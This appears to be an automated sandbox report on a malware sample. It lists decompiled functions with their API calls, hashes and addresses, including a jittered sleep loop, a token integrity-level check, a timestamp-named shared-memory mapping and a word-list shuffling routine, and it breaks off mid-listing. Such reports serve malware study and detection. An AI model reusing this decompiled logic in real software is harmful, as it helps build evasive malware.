0x02a75289
0x02a7528e
0x00000000
0x00000000
0x02a75290
0x02a75293
0x02a75296
0x02a75299
0x00000000
0x02a7529b
0x02a752aa
0x02a752aa
0x00000000
0x02a752d8
0x02a752d8
0x02a752dd
0x02a752fc
0x02a752fe
0x02a75303
0x02a75304
0x00000000
0x02a752df
0x02a752df
0x02a752e5
0x00000000
0x02a752e7
0x02a752e7
0x02a752ec
0x02a752ee
0x02a752f3
0x02a752f4
0x02a7530a
0x02a7530a
0x02a75312
0x02a7531d
0x02a75320
0x02a7532b
0x02a7532d
0x02a75330
0x02a75332
0x00000000
0x02a75338
0x00000000
0x02a75338
0x02a75332
0x02a752e5
0x00000000
0x02a752dd
0x02a752ad
0x02a752af
0x02a752b2
0x02a752b3
0x02a752b3
0x02a752b7
0x02a752c1
0x02a752c1
0x02a752c7
0x02a752ca
0x02a752ca
0x02a752d0
0x02a752d0
0x02a7534d
0x00000000

APIs

memset.NTDLL ref: 02A751C5
CreateWaitableTimerA.KERNEL32(00000000,00000001,00000000), ref: 02A751D1
_allmul.NTDLL(00000000,FF676980,000000FF), ref: 02A751F6
SetWaitableTimer.KERNELBASE(?,?,00000000,00000000,00000000,00000000), ref: 02A75212
WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 02A7522B
HeapFree.KERNEL32(00000000,00000000), ref: 02A752C1
CloseHandle.KERNEL32(?), ref: 02A752D0
_allmul.NTDLL(00000000,FF676980,000000FF,00000002), ref: 02A7530A
SetWaitableTimer.KERNELBASE(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF,00000002,?,?,02A75D5E,?), ref: 02A75320
WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 02A7532B

Part of subcall function 02A78D14: StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,04D19368,00000000,?,7519F710,00000000,7519F730), ref: 02A78D63
Part of subcall function 02A78D14: HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,04D193A0,?,00000000,30314549,00000014,004F0053,04D1935C), ref: 02A78E00
Part of subcall function 02A78D14: HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,02A7523E), ref: 02A78E12

GetLastError.KERNEL32 ref: 02A7533D

Memory Dump Source

Source File: 00000003.00000002.497510597.0000000002A71000.00000020.00000001.sdmp, Offset: 02A70000, based on PE: true

Associated: 00000003.00000002.497500527.0000000002A70000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.497530250.0000000002A7C000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.497539740.0000000002A7D000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.497549340.0000000002A7F000.00000002.00000001.sdmp Download File

Similarity

API ID: FreeHeapTimerWaitable$MultipleObjectsWait_allmul$CloseCreateErrorHandleLastmemset
String ID:
API String ID: 3521023985-0
Opcode ID: 67425986ea86b402aec291d1c5938f85a48722415e6c6fa0cd12c5c44885d93e
Instruction ID: 2c620c3272edbd24263f1f55e0346959f77fec9bc14da26a9fea42258ff11172
Opcode Fuzzy Hash: 67425986ea86b402aec291d1c5938f85a48722415e6c6fa0cd12c5c44885d93e
Instruction Fuzzy Hash: E3515B71C41228ABDF119F94DD84EEEFFB9EF59720F204616E811A2190DB708A55CFE8

Uniqueness

Uniqueness Score: -1.00%

Function 02A7232F, Relevance: 13.6, APIs: 9, Instructions: 72
filetimeCOMMON

Download Yara Rule

C-Code - Quality: 74%

			E02A7232F(intOrPtr __edx, void** _a4, void** _a8) {
				intOrPtr _v8;
				struct _FILETIME* _v12;
				short _v56;
				struct _FILETIME* _t12;
				intOrPtr _t13;
				void* _t17;
				void* _t21;
				intOrPtr _t27;
				long _t28;
				void* _t30;

				_t27 = __edx;
				_t12 =  &_v12;
				GetSystemTimeAsFileTime(_t12);
				_push(0x192);
				_push(0x54d38000);
				_push(_v8);
				_push(_v12);
				L02A7AF28();
				_push(_t12);
				_v12 = _t12;
				_t13 =  *0x2a7d2a8; // 0x229a5a8
				_t5 = _t13 + 0x2a7e87e; // 0x4d18e26
				_t6 = _t13 + 0x2a7e59c; // 0x530025
				_push(0x16);
				_push( &_v56);
				_v8 = _t27;
				L02A7ABCA();
				_t17 = CreateFileMappingW(0xffffffff, 0x2a7d2ac, 4, 0, 0x1000,  &_v56); // executed
				_t30 = _t17;
				if(_t30 == 0) {
					_t28 = GetLastError();
				} else {
					if(GetLastError() == 0xb7) {
						_t21 = MapViewOfFile(_t30, 6, 0, 0, 0); // executed
						if(_t21 == 0) {
							_t28 = GetLastError();
							if(_t28 != 0) {
								goto L6;
							}
						} else {
							 *_a4 = _t30;
							 *_a8 = _t21;
							_t28 = 0;
						}
					} else {
						_t28 = 2;
						L6:
						CloseHandle(_t30);
					}
				}
				return _t28;
			}

0x02a7232f
0x02a72337
0x02a7233b
0x02a72341
0x02a72346
0x02a7234b
0x02a7234e
0x02a72351
0x02a72356
0x02a72357
0x02a7235a
0x02a7235f
0x02a72366
0x02a72370
0x02a72372
0x02a72373
0x02a72376
0x02a72392
0x02a72398
0x02a7239c
0x02a723ea
0x02a7239e
0x02a723ab
0x02a723bb
0x02a723c3
0x02a723d5
0x02a723d9
0x00000000
0x00000000
0x02a723c5
0x02a723c8
0x02a723cd
0x02a723cf
0x02a723cf
0x02a723ad
0x02a723af
0x02a723db
0x02a723dc
0x02a723dc
0x02a723ab
0x02a723f1

APIs

GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,02A75C31,?,?,4D283A53,?,?), ref: 02A7233B
_aulldiv.NTDLL(?,?,54D38000,00000192), ref: 02A72351
_snwprintf.NTDLL ref: 02A72376
CreateFileMappingW.KERNELBASE(000000FF,02A7D2AC,00000004,00000000,00001000,?), ref: 02A72392
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,02A75C31,?,?,4D283A53), ref: 02A723A4
MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000), ref: 02A723BB
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,02A75C31,?,?), ref: 02A723DC
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,02A75C31,?,?,4D283A53), ref: 02A723E4

Memory Dump Source

Source File: 00000003.00000002.497510597.0000000002A71000.00000020.00000001.sdmp, Offset: 02A70000, based on PE: true

Associated: 00000003.00000002.497500527.0000000002A70000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.497530250.0000000002A7C000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.497539740.0000000002A7D000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.497549340.0000000002A7F000.00000002.00000001.sdmp Download File

Similarity

API ID: File$ErrorLastTime$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
String ID:
API String ID: 1814172918-0
Opcode ID: 5d95e52f44f008258a57cab4f1833c277dbdfb3a569493f85980727d58865136
Instruction ID: 631996c6f1925a6cc37ac35b40a0829023fc8a37766e460c55e42fa363169861
Opcode Fuzzy Hash: 5d95e52f44f008258a57cab4f1833c277dbdfb3a569493f85980727d58865136
Instruction Fuzzy Hash: CD21B772A80204BBE711AF64DC45F9E77BAAB84711F150562FA05E71D0DF70D90ACB98

Uniqueness

Uniqueness Score: -1.00%

Function 6DDE3020, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 77COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 6DDE304A

Part of subcall function 6DDE9205: __lock.LIBCMT ref: 6DDE9216

int.LIBCPMTD ref: 6DDE3063

Part of subcall function 6DDE4660: std::_Lockit::_Lockit.LIBCPMT ref: 6DDE4676

Strings

bad cast, xrefs: 6DDE30A5

Memory Dump Source

Source File: 00000003.00000002.500576744.000000006DDD0000.00000040.00020000.sdmp, Offset: 6DDD0000, based on PE: false

Similarity

API ID: LockitLockit::_std::_$__lock
String ID: bad cast
API String ID: 172949856-3145022300
Opcode ID: 9df6e8a2fbdd4dc7a4f1479e5481dd39b9a98b7dc0862aded1f1a9e04466e336
Instruction ID: 15b64456f2fb6f8321cbca0d6a1e918c1acea78ab6937009f25a6beb9c7d5308
Opcode Fuzzy Hash: 9df6e8a2fbdd4dc7a4f1479e5481dd39b9a98b7dc0862aded1f1a9e04466e336
Instruction Fuzzy Hash: 5E311CB1D18209DFCB04DFA8C981BFEBBB4FB49354F104629E525A7390DB346A00CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 02A71A08, Relevance: 10.6, APIs: 7, Instructions: 75
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E02A71A08(long* _a4) {
				long _v8;
				void* _v12;
				void _v16;
				long _v20;
				int _t33;
				void* _t46;

				_v16 = 1;
				_v20 = 0x2000;
				if( *0x2a7d25c > 5) {
					_v16 = 0;
					if(OpenProcessToken(0xffffffff, 0x20008,  &_v12) != 0) {
						GetTokenInformation(_v12, 0x14,  &_v16, 4,  &_v8); // executed
						_v8 = 0;
						GetTokenInformation(_v12, 0x19, 0, 0,  &_v8); // executed
						if(_v8 != 0) {
							_t46 = E02A7A71F(_v8);
							if(_t46 != 0) {
								_t33 = GetTokenInformation(_v12, 0x19, _t46, _v8,  &_v8); // executed
								if(_t33 != 0) {
									_v20 =  *(GetSidSubAuthority( *_t46,  *(GetSidSubAuthorityCount( *_t46)) - 0x00000001 & 0x000000ff));
								}
								E02A7A734(_t46);
							}
						}
						CloseHandle(_v12);
					}
				}
				 *_a4 = _v20;
				return _v16;
			}

0x02a71a15
0x02a71a1c
0x02a71a23
0x02a71a37
0x02a71a42
0x02a71a5a
0x02a71a67
0x02a71a6a
0x02a71a6f
0x02a71a7a
0x02a71a7e
0x02a71a8d
0x02a71a91
0x02a71aad
0x02a71aad
0x02a71ab1
0x02a71ab1
0x02a71ab6
0x02a71aba
0x02a71ac0
0x02a71ac1
0x02a71ac8
0x02a71ace

APIs

OpenProcessToken.ADVAPI32(000000FF,00020008,00000000,00000000), ref: 02A71A3A
GetTokenInformation.KERNELBASE(00000000,00000014(TokenIntegrityLevel),00000001,00000004,?,00000000), ref: 02A71A5A
GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,00000000,?), ref: 02A71A6A
CloseHandle.KERNEL32(00000000), ref: 02A71ABA

Part of subcall function 02A7A71F: RtlAllocateHeap.NTDLL(00000000,00000000,02A75595), ref: 02A7A72B

GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,?,?,?,?), ref: 02A71A8D
GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 02A71A95
GetSidSubAuthority.ADVAPI32(00000000,?), ref: 02A71AA5

Memory Dump Source

Source File: 00000003.00000002.497510597.0000000002A71000.00000020.00000001.sdmp, Offset: 02A70000, based on PE: true

Associated: 00000003.00000002.497500527.0000000002A70000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.497530250.0000000002A7C000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.497539740.0000000002A7D000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.497549340.0000000002A7F000.00000002.00000001.sdmp Download File

Similarity

API ID: Token$Information$Authority$AllocateCloseCountHandleHeapOpenProcess
String ID:
API String ID: 1295030180-0
Opcode ID: cc88016bf585ce6cb3e63e39156342b1b1d974ee0969dda3dbd23790534ecf18
Instruction ID: c72d8a8eb2edff34e5b4a3a161e8e95fc3011eb609b4cfee0df19c4c97e9c234
Opcode Fuzzy Hash: cc88016bf585ce6cb3e63e39156342b1b1d974ee0969dda3dbd23790534ecf18
Instruction Fuzzy Hash: 2E216D75D00248FFEB10DF94DC84EEEBBB9EF44304F0000A6E901A6250DB718A16DF64

Uniqueness

Uniqueness Score: -1.00%

Function 02A7391F, Relevance: 9.2, APIs: 6, Instructions: 154memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(?), ref: 02A7395A
IUnknown_QueryInterface_Proxy.RPCRT4(?,332C4425,?), ref: 02A739DD
StrStrIW.SHLWAPI(00000000,006E0069), ref: 02A73A1D
SysFreeString.OLEAUT32(00000000), ref: 02A73A3F

Part of subcall function 02A76F3A: SysAllocString.OLEAUT32(02A7C290), ref: 02A76F8A

SafeArrayDestroy.OLEAUT32(00000000), ref: 02A73A92
SysFreeString.OLEAUT32(00000000), ref: 02A73AA1

Part of subcall function 02A71AE2: Sleep.KERNELBASE(000001F4), ref: 02A71B2A

Memory Dump Source

Source File: 00000003.00000002.497510597.0000000002A71000.00000020.00000001.sdmp, Offset: 02A70000, based on PE: true

Associated: 00000003.00000002.497500527.0000000002A70000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.497530250.0000000002A7C000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.497539740.0000000002A7D000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.497549340.0000000002A7F000.00000002.00000001.sdmp Download File

Similarity

API ID: String$AllocFree$ArrayDestroyInterface_ProxyQuerySafeSleepUnknown_
String ID:
API String ID: 2118684380-0
Opcode ID: dd77a5a37a34dc20767d571b270663897ea6c8628cc64e78ba4f079436eefa12
Instruction ID: 3e18deb1e69904d3ed1c6023782cb80ace5216c16b7d6665aa45212299762881
Opcode Fuzzy Hash: dd77a5a37a34dc20767d571b270663897ea6c8628cc64e78ba4f079436eefa12
Instruction Fuzzy Hash: A6515175940609AFDB01CFA8CC84A9EB7BAFF88704F154869E905DB220DF71DD46CB54

Uniqueness

Uniqueness Score: -1.00%

Function 02A712E5, Relevance: 9.1, APIs: 6, Instructions: 60
sleepmemorytimeCOMMON

Download Yara Rule

C-Code - Quality: 74%

			E02A712E5(void* __ecx, void* __edx, intOrPtr _a4) {
				struct _FILETIME _v12;
				void* _t10;
				void* _t12;
				int _t14;
				signed int _t16;
				void* _t18;
				signed int _t19;
				unsigned int _t23;
				void* _t26;
				signed int _t33;

				_t26 = __edx;
				_push(__ecx);
				_push(__ecx);
				_t10 = HeapCreate(0, 0x400000, 0); // executed
				 *0x2a7d238 = _t10;
				if(_t10 != 0) {
					 *0x2a7d1a8 = GetTickCount();
					_t12 = E02A73E69(_a4);
					if(_t12 == 0) {
						do {
							GetSystemTimeAsFileTime( &_v12);
							_t14 = SwitchToThread();
							_t23 = _v12.dwHighDateTime;
							_t16 = (_t23 << 0x00000020 | _v12.dwLowDateTime) >> 7;
							_push(0);
							_push(9);
							_push(_t23 >> 7);
							_push(_t16);
							L02A7B08A();
							_t33 = _t14 + _t16;
							_t18 = E02A75548(_a4, _t33);
							_t19 = 2;
							_t25 = _t33;
							Sleep(_t19 << _t33); // executed
						} while (_t18 == 1);
						if(E02A74DA2(_t25) != 0) {
							 *0x2a7d260 = 1; // executed
						}
						_t12 = E02A75BA2(_t26); // executed
					}
				} else {
					_t12 = 8;
				}
				return _t12;
			}

0x02a712e5
0x02a712eb
0x02a712ec
0x02a712f8
0x02a712fe
0x02a71305
0x02a71315
0x02a7131a
0x02a71321
0x02a71323
0x02a71328
0x02a7132e
0x02a71334
0x02a7133e
0x02a71342
0x02a71344
0x02a71349
0x02a7134a
0x02a7134b
0x02a71350
0x02a71356
0x02a7135f
0x02a71360
0x02a71365
0x02a7136b
0x02a71377
0x02a71379
0x02a71379
0x02a71383
0x02a71383
0x02a71307
0x02a71309
0x02a71309
0x02a7138d

APIs

HeapCreate.KERNELBASE(00000000,00400000,00000000,?,00000001,?,?,?,02A74EF2,?), ref: 02A712F8
GetTickCount.KERNEL32 ref: 02A7130C
GetSystemTimeAsFileTime.KERNEL32(?,?,?,00000001,?,?,?,02A74EF2,?), ref: 02A71328
SwitchToThread.KERNEL32(?,00000001,?,?,?,02A74EF2,?), ref: 02A7132E
_aullrem.NTDLL(?,?,00000009,00000000), ref: 02A7134B
Sleep.KERNELBASE(00000002,00000000,?,00000001,?,?,?,02A74EF2,?), ref: 02A71365

Memory Dump Source

Source File: 00000003.00000002.497510597.0000000002A71000.00000020.00000001.sdmp, Offset: 02A70000, based on PE: true

Associated: 00000003.00000002.497500527.0000000002A70000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.497530250.0000000002A7C000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.497539740.0000000002A7D000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.497549340.0000000002A7F000.00000002.00000001.sdmp Download File

Similarity

API ID: Time$CountCreateFileHeapSleepSwitchSystemThreadTick_aullrem
String ID:
API String ID: 507476733-0
Opcode ID: 72e704211dc2697d6b9472f90a7369e225b65bea24dff4b064bc439f3635e676
Instruction ID: 3e7d13369d862ff390a4bffe47cdc214dd050fbd08b96ec5d4831d6525eaad7a
Opcode Fuzzy Hash: 72e704211dc2697d6b9472f90a7369e225b65bea24dff4b064bc439f3635e676
Instruction Fuzzy Hash: 30110C71FC0300AFE7106B64DC49B5A77DAEB44360F000955F949D7680FF70D4168AAC

Uniqueness

Uniqueness Score: -1.00%

Function 02A75BA2, Relevance: 7.7, APIs: 5, Instructions: 159
memoryCOMMON

Download Yara Rule

C-Code - Quality: 57%

			E02A75BA2(signed int __edx) {
				signed int _v8;
				long _v12;
				CHAR* _v16;
				long _v20;
				void* __edi;
				void* __esi;
				void* _t21;
				CHAR* _t22;
				CHAR* _t25;
				intOrPtr _t26;
				void* _t27;
				void* _t31;
				void* _t32;
				CHAR* _t36;
				CHAR* _t42;
				CHAR* _t43;
				CHAR* _t44;
				void* _t49;
				void* _t51;
				CHAR* _t54;
				signed char _t56;
				intOrPtr _t58;
				signed int _t59;
				void* _t62;
				CHAR* _t65;
				CHAR* _t66;
				char* _t67;
				void* _t68;

				_t61 = __edx;
				_v20 = 0;
				_v8 = 0;
				_v12 = 0;
				_t21 = E02A76C09();
				if(_t21 != 0) {
					_t59 =  *0x2a7d25c; // 0x4000000a
					_t55 = (_t59 & 0xf0000000) + _t21;
					 *0x2a7d25c = (_t59 & 0xf0000000) + _t21;
				}
				_t22 =  *0x2a7d160(0, 2); // executed
				_v16 = _t22;
				if(_t22 == 0 || _t22 == 1 || _t22 == 0x80010106) {
					_t25 = E02A7496B( &_v8,  &_v20); // executed
					_t54 = _t25;
					_t26 =  *0x2a7d2a8; // 0x229a5a8
					if( *0x2a7d25c > 5) {
						_t8 = _t26 + 0x2a7e5cd; // 0x4d283a53
						_t27 = _t8;
					} else {
						_t7 = _t26 + 0x2a7e9f5; // 0x44283a44
						_t27 = _t7;
					}
					E02A7729A(_t27, _t27);
					_t31 = E02A7232F(_t61,  &_v20,  &_v12); // executed
					if(_t31 == 0) {
						CloseHandle(_v20);
					}
					_t62 = 5;
					if(_t54 != _t62) {
						 *0x2a7d270 =  *0x2a7d270 ^ 0x81bbe65d;
						_t32 = E02A7A71F(0x60);
						 *0x2a7d32c = _t32;
						__eflags = _t32;
						if(_t32 == 0) {
							_push(8);
							_pop(0);
						} else {
							memset(_t32, 0, 0x60);
							_t49 =  *0x2a7d32c; // 0x4d195b0
							_t68 = _t68 + 0xc;
							__imp__(_t49 + 0x40);
							_t51 =  *0x2a7d32c; // 0x4d195b0
							 *_t51 = 0x2a7e81a;
						}
						_t54 = 0;
						__eflags = 0;
						if(0 == 0) {
							_t36 = RtlAllocateHeap( *0x2a7d238, 0, 0x43);
							 *0x2a7d2c8 = _t36;
							__eflags = _t36;
							if(_t36 == 0) {
								_push(8);
								_pop(0);
							} else {
								_t56 =  *0x2a7d25c; // 0x4000000a
								_t61 = _t56 & 0x000000ff;
								_t58 =  *0x2a7d2a8; // 0x229a5a8
								_t13 = _t58 + 0x2a7e55a; // 0x697a6f4d
								_t55 = _t13;
								wsprintfA(_t36, _t13, _t56 & 0x000000ff, _t56 & 0x000000ff, 0x2a7c287);
							}
							_t54 = 0;
							__eflags = 0;
							if(0 == 0) {
								asm("sbb eax, eax");
								E02A79135( ~_v8 &  *0x2a7d270, 0x2a7d00c); // executed
								_t42 = E02A7888E(_t55); // executed
								_t54 = _t42;
								__eflags = _t54;
								if(_t54 != 0) {
									goto L30;
								}
								_t43 = E02A787AE(); // executed
								__eflags = _t43;
								if(_t43 != 0) {
									__eflags = _v8;
									_t65 = _v12;
									if(_v8 != 0) {
										L29:
										_t44 = E02A751B0(_t61, _t65, _v8); // executed
										_t54 = _t44;
										goto L30;
									}
									__eflags = _t65;
									if(__eflags == 0) {
										goto L30;
									}
									_t54 = E02A71C66(__eflags,  &(_t65[4]));
									__eflags = _t54;
									if(_t54 == 0) {
										goto L30;
									}
									goto L29;
								}
								_t54 = 8;
							}
						}
					} else {
						_t66 = _v12;
						if(_t66 == 0) {
							L30:
							if(_v16 == 0 || _v16 == 1) {
								 *0x2a7d15c();
							}
							goto L34;
						}
						_t67 =  &(_t66[4]);
						do {
						} while (E02A7A273(_t62, _t67, 0, 1) == 0x4c7);
					}
					goto L30;
				} else {
					_t54 = _t22;
					L34:
					return _t54;
				}
			}

0x02a75ba2
0x02a75bad
0x02a75bb0
0x02a75bb3
0x02a75bb6
0x02a75bbd
0x02a75bbf
0x02a75bcb
0x02a75bcd
0x02a75bcd
0x02a75bd6
0x02a75bdc
0x02a75be1
0x02a75bfb
0x02a75c07
0x02a75c09
0x02a75c0e
0x02a75c18
0x02a75c18
0x02a75c10
0x02a75c10
0x02a75c10
0x02a75c10
0x02a75c1f
0x02a75c2c
0x02a75c33
0x02a75c38
0x02a75c38
0x02a75c40
0x02a75c43
0x02a75c69
0x02a75c75
0x02a75c7a
0x02a75c7f
0x02a75c81
0x02a75cad
0x02a75caf
0x02a75c83
0x02a75c87
0x02a75c8c
0x02a75c91
0x02a75c98
0x02a75c9e
0x02a75ca3
0x02a75ca9
0x02a75cb0
0x02a75cb2
0x02a75cb4
0x02a75cc3
0x02a75cc9
0x02a75cce
0x02a75cd0
0x02a75d00
0x02a75d02
0x02a75cd2
0x02a75cd2
0x02a75cd8
0x02a75ce5
0x02a75ceb
0x02a75ceb
0x02a75cf3
0x02a75cfc
0x02a75d03
0x02a75d05
0x02a75d07
0x02a75d0e
0x02a75d1b
0x02a75d20
0x02a75d25
0x02a75d27
0x02a75d29
0x00000000
0x00000000
0x02a75d2b
0x02a75d30
0x02a75d32
0x02a75d39
0x02a75d3d
0x02a75d40
0x02a75d55
0x02a75d59
0x02a75d5e
0x00000000
0x02a75d5e
0x02a75d42
0x02a75d44
0x00000000
0x00000000
0x02a75d4f
0x02a75d51
0x02a75d53
0x00000000
0x00000000
0x00000000
0x02a75d53
0x02a75d36
0x02a75d36
0x02a75d07
0x02a75c45
0x02a75c45
0x02a75c4a
0x02a75d60
0x02a75d64
0x02a75d6c
0x02a75d6c
0x00000000
0x02a75d64
0x02a75c50
0x02a75c53
0x02a75c5d
0x02a75c64
0x00000000
0x02a75d74
0x02a75d74
0x02a75d78
0x02a75d7c
0x02a75d7c

APIs

Part of subcall function 02A76C09: GetModuleHandleA.KERNEL32(4C44544E,00000000,02A75BBB,00000000,00000000), ref: 02A76C18

CloseHandle.KERNEL32(?,?,?,4D283A53,?,?), ref: 02A75C38

Part of subcall function 02A7A71F: RtlAllocateHeap.NTDLL(00000000,00000000,02A75595), ref: 02A7A72B

memset.NTDLL ref: 02A75C87
RtlInitializeCriticalSection.NTDLL(04D19570), ref: 02A75C98

Part of subcall function 02A71C66: memset.NTDLL ref: 02A71C7B
Part of subcall function 02A71C66: lstrlenW.KERNEL32(00000000,00410025,00000005,?,00000000), ref: 02A71CBD
Part of subcall function 02A71C66: StrCmpNIW.SHLWAPI(00000000,00000000,00000000), ref: 02A71CC8

RtlAllocateHeap.NTDLL(00000000,00000043,00000060), ref: 02A75CC3
wsprintfA.USER32 ref: 02A75CF3

Memory Dump Source

Source File: 00000003.00000002.497510597.0000000002A71000.00000020.00000001.sdmp, Offset: 02A70000, based on PE: true

Associated: 00000003.00000002.497500527.0000000002A70000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.497530250.0000000002A7C000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.497539740.0000000002A7D000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.497549340.0000000002A7F000.00000002.00000001.sdmp Download File

Similarity

API ID: AllocateHandleHeapmemset$CloseCriticalInitializeModuleSectionlstrlenwsprintf
String ID:
API String ID: 4246211962-0
Opcode ID: ce132e10311d506e287b946c71d3eeea9b5d1addbee888766c025eee50e1ff0e
Instruction ID: da4df7f7dd96bc2a3ef2e9d2f70074220edcf21551c751293e43c65135a957ca
Opcode Fuzzy Hash: ce132e10311d506e287b946c71d3eeea9b5d1addbee888766c025eee50e1ff0e
Instruction Fuzzy Hash: 5951F871E80718ABDB21EBA0DD88B5EB7B9EF04700F844866E905D7141EF70D94ACB9C

Uniqueness

Uniqueness Score: -1.00%

Function 02A762DA, Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 145
stringCOMMON

Download Yara Rule

C-Code - Quality: 22%

			E02A762DA(signed int __eax, signed int _a4, signed int _a8) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				signed int _v20;
				intOrPtr _t81;
				char _t83;
				signed int _t90;
				signed int _t97;
				signed int _t99;
				char _t101;
				unsigned int _t102;
				intOrPtr _t103;
				char* _t107;
				signed int _t110;
				signed int _t113;
				signed int _t118;
				signed int _t122;
				intOrPtr _t124;

				_t102 = _a8;
				_t118 = 0;
				_v20 = __eax;
				_t122 = (_t102 >> 2) + 1;
				_v8 = 0;
				_a8 = 0;
				_t81 = E02A7A71F(_t122 << 2);
				_v16 = _t81;
				if(_t81 == 0) {
					_push(8);
					_pop(0);
					L37:
					return 0;
				}
				_t107 = _a4;
				_a4 = _t102;
				_t113 = 0;
				while(1) {
					_t83 =  *_t107;
					if(_t83 == 0) {
						break;
					}
					if(_t83 == 0xd || _t83 == 0xa) {
						if(_t118 != 0) {
							if(_t118 > _v8) {
								_v8 = _t118;
							}
							_a8 = _a8 + 1;
							_t118 = 0;
						}
						 *_t107 = 0;
						goto L16;
					} else {
						if(_t118 != 0) {
							L10:
							_t118 = _t118 + 1;
							L16:
							_t107 = _t107 + 1;
							_t15 =  &_a4;
							 *_t15 = _a4 - 1;
							if( *_t15 != 0) {
								continue;
							}
							break;
						}
						if(_t113 == _t122) {
							L21:
							if(_a8 <= 0x20) {
								_push(0xb);
								L34:
								_pop(0);
								L35:
								E02A7A734(_v16);
								goto L37;
							}
							_t24 = _v8 + 5; // 0xcdd8d2f8
							_t103 = E02A7A71F((_v8 + _t24) * _a8 + 4);
							if(_t103 == 0) {
								_push(8);
								goto L34;
							}
							_t90 = _a8;
							_a4 = _a4 & 0x00000000;
							_v8 = _v8 & 0x00000000;
							_t124 = _t103 + _t90 * 4;
							if(_t90 <= 0) {
								L31:
								 *0x2a7d278 = _t103;
								goto L35;
							}
							do {
								_t110 = 0x3c6ef35f + _v20 * 0x19660d;
								_v20 = 0x3c6ef35f + _t110 * 0x19660d;
								__imp__(_t124,  *((intOrPtr*)(_v16 + _t110 % _a8 * 4)));
								__imp__(_t124,  *((intOrPtr*)(_v16 + _v20 % _a8 * 4)));
								_v12 = _v12 & 0x00000000;
								if(_a4 <= 0) {
									goto L30;
								} else {
									goto L26;
								}
								while(1) {
									L26:
									_t99 = _v12;
									__imp__( *((intOrPtr*)(_t103 + _t99 * 4)), _t124); // executed
									if(_t99 == 0) {
										break;
									}
									_v12 = _v12 + 1;
									if(_v12 < _a4) {
										continue;
									}
									goto L30;
								}
								_v8 = _v8 - 1;
								L30:
								_t97 = _a4;
								_a4 = _a4 + 1;
								 *((intOrPtr*)(_t103 + _t97 * 4)) = _t124;
								__imp__(_t124);
								_v8 = _v8 + 1;
								_t124 = _t124 + _t97 + 1;
							} while (_v8 < _a8);
							goto L31;
						}
						 *((intOrPtr*)(_v16 + _t113 * 4)) = _t107;
						_t101 = _t83;
						if(_t83 - 0x61 <= 0x19) {
							_t101 = _t101 - 0x20;
						}
						 *_t107 = _t101;
						_t113 = _t113 + 1;
						goto L10;
					}
				}
				if(_t118 != 0) {
					if(_t118 > _v8) {
						_v8 = _t118;
					}
					_a8 = _a8 + 1;
				}
				goto L21;
			}

0x02a762e1
0x02a762e8
0x02a762ed
0x02a762f0
0x02a762f7
0x02a762fa
0x02a762fd
0x02a76302
0x02a76307
0x02a7645b
0x02a7645d
0x02a7645f
0x02a76464
0x02a76464
0x02a7630d
0x02a76310
0x02a76313
0x02a76315
0x02a76315
0x02a76319
0x00000000
0x00000000
0x02a7631d
0x02a76349
0x02a7634e
0x02a76350
0x02a76350
0x02a76353
0x02a76356
0x02a76356
0x02a76358
0x00000000
0x02a76323
0x02a76325
0x02a76344
0x02a76344
0x02a7635b
0x02a7635b
0x02a7635c
0x02a7635c
0x02a7635f
0x00000000
0x00000000
0x00000000
0x02a7635f
0x02a76329
0x02a76370
0x02a76374
0x02a7644e
0x02a76450
0x02a76450
0x02a76451
0x02a76454
0x00000000
0x02a76454
0x02a7637d
0x02a7638e
0x02a76392
0x02a7644a
0x00000000
0x02a7644a
0x02a76398
0x02a7639b
0x02a7639f
0x02a763a3
0x02a763a8
0x02a76440
0x02a76440
0x00000000
0x02a76446
0x02a763b3
0x02a763bc
0x02a763d0
0x02a763d7
0x02a763ec
0x02a763f2
0x02a763fa
0x00000000
0x00000000
0x00000000
0x00000000
0x02a763fc
0x02a763fc
0x02a763fc
0x02a76403
0x02a7640b
0x00000000
0x00000000
0x02a7640d
0x02a76416
0x00000000
0x00000000
0x00000000
0x02a76418
0x02a7641a
0x02a7641d
0x02a7641d
0x02a76420
0x02a76424
0x02a76427
0x02a7642d
0x02a76430
0x02a76437
0x00000000
0x02a763b3
0x02a7632e
0x02a76336
0x02a7633c
0x02a7633e
0x02a7633e
0x02a76341
0x02a76343
0x00000000
0x02a76343
0x02a7631d
0x02a76363
0x02a76368
0x02a7636a
0x02a7636a
0x02a7636d
0x02a7636d
0x00000000

APIs

